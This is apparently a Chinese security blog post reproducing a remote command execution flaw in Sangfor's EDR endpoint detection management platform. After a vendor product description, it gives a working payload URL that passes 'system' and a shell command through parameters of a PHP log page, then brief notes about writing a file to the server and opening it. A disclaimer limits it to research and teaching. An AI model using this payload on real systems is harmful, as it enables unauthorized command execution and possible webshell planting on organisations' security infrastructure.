昨晚通宵,刚刚睡醒发现群里面炸锅了-EDR终端检测平台RCE
自己也来看看。
简介:
EDR简介(来自官方):
终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(MGR)共同组成。
EDR的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件IOC的全网威胁定位。
端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服的 EDR产品也支持与AC、SIP、AF、SOC、X-central产品的联动协同响应,形成新一代的安全防护体系。
PAYLOAD:
https://xxx.xxx/tool/log/c.php?strip_slashes=system&host=whoami
读取页面:
写文件 123
写入成功
访问123
参考链接:
https://www.cnblogs.com/potatsoSec/p/13520546.html
https://mp.weixin.qq.com/s/4VtJ_M0c5GZsV4CmBr9CsQ
https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=118295
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
订阅查看更多复现文章、学习笔记
thelostworld
安全路上,与你并肩前行!!!!
网友评论